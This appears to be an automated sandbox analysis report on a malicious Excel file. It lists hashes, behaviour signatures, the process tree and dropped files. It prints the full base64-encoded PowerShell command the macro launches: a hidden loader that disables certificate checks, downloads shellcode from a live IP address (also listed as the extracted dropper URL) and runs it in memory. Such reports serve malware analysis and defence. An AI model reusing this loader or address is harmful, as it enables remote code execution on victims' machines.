Analysis

  • max time kernel
    47s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 21:46

General

  • Target

    edff33728be32021df39e1a47cf7f6312ad1e8bfe8bea7622321d864cc59e912.xls

  • Size

    46KB

  • MD5

    599429737e8714d5c491225a35a0366e

  • SHA1

    7049ab521a9043b08b8a5a5015cf281af12d2b41

  • SHA256

    edff33728be32021df39e1a47cf7f6312ad1e8bfe8bea7622321d864cc59e912

  • SHA512

    7336335c258b0b1c1dd7d80c978f399e726678288993ed5035f5a3447c4379ef24dda0c6689c6de133d4f23fd9bce6f485ac5d9ac270ad4000dff8d89894dae5

  • SSDEEP

    768:n4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:4SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edff33728be32021df39e1a47cf7f6312ad1e8bfe8bea7622321d864cc59e912.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2520
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp" "c:\Users\Admin\AppData\Local\Temp\j5y02wq3\CSC3E131DC29F79426D8589513FE96B98E9.TMP"
          4⤵
            PID:2328

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp

      Filesize

      1KB

      MD5

      f8d52ada773081c716c7d81f8a094989

      SHA1

      cbbe54ef2b7a9aec626afec554a1800671e8fba6

      SHA256

      a51f4b982bfd79f62f9b9d4aadd58472951257b788cc51338e3a6d7b095c5cdb

      SHA512

      aaba11df323e53af8909f911c15253ae40dda91541954b8abcb220ee0d29233ae50b015f14ec4b99d17e6ef58af4144aee7d4489d7f20d240bc4b41bfdd4f404

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r0fcm3cy.i3o.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.dll

      Filesize

      3KB

      MD5

      85c61b3383800ac3f354d5d20fb574ca

      SHA1

      c0f6a2bb8d22a20602d761a006cb1829df49ee88

      SHA256

      87a002baef47d101aa83602d0791637b3f008b7bbaffcd6724ce44105902f5a7

      SHA512

      d6391a32aa0c8da912d80e043eac9ddd2d4d8c637b645bb1fd7b0d211bf025d8c7becca3aa5150b271c070e165c190a479cc709919c44a9109c85ec303eaf166

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      2KB

      MD5

      13062738302d6640c63e917f6f6bf1a1

      SHA1

      d6d83e2f251eb3d16a5a254d52cc95ba1d06ddeb

      SHA256

      9e4df17d20a06123ce6d3b3cbbc7b9831d052cbd2bcb4c0ae4682578cb16160a

      SHA512

      2b12d118ba601fc8afbcbd8499494603a416869b75a81cd4d00441bcbc1429bf4329f78b6373f9d2aaf05f9e8fd7a8e7cf7881502d30c61f91091e196624fad7

    • \??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\CSC3E131DC29F79426D8589513FE96B98E9.TMP

      Filesize

      652B

      MD5

      007be0b628b0ae0f10bba835090f481f

      SHA1

      d92218f8946f6485ed5ea8cb538564757d04b776

      SHA256

      f1a0b312adf73874976ade43f3af9fc0bc97fafaee15c40f725812b8df913bce

      SHA512

      ca0f06ef28db61204bfe8c8d01c316df31d729acf3fddb77940c3547f649b5a3a45953718a04c39df12fa9ded7e802068bb50a0ca78fca290b67bb3aabbd550c

    • \??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.cmdline

      Filesize

      369B

      MD5

      57ff751eee787ca65c1d5e0ad1fad16b

      SHA1

      b59638ed73c956d1d9112fe29bdbdfa3925c7fbb

      SHA256

      d85fe468fafec968d176d137cd5f6db5c73788d893717e460316fb947a09d974

      SHA512

      3a0bcce641db3f7d9aca7944dca0705088e2fdb3e62103429fc22c340acf625a5e019f5fd45bc76af04a58369cf9625de33c1bec6b9ba908688baa39fb32b4f1

    • memory/2520-32-0x00000176F9130000-0x00000176F9152000-memory.dmp

      Filesize

      136KB

    • memory/2520-56-0x00000176F9160000-0x00000176F9168000-memory.dmp

      Filesize

      32KB

    • memory/4868-5-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-1-0x00007FFA2E6AD000-0x00007FFA2E6AE000-memory.dmp

      Filesize

      4KB

    • memory/4868-11-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-12-0x00007FF9EC280000-0x00007FF9EC290000-memory.dmp

      Filesize

      64KB

    • memory/4868-13-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-14-0x00007FF9EC280000-0x00007FF9EC290000-memory.dmp

      Filesize

      64KB

    • memory/4868-15-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-17-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-16-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-19-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-18-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-21-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-20-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-23-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-25-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-10-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-8-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-9-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-7-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-6-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-0-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-4-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-2-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-63-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-64-0x00007FFA2E6AD000-0x00007FFA2E6AE000-memory.dmp

      Filesize

      4KB

    • memory/4868-65-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-69-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-70-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-3-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB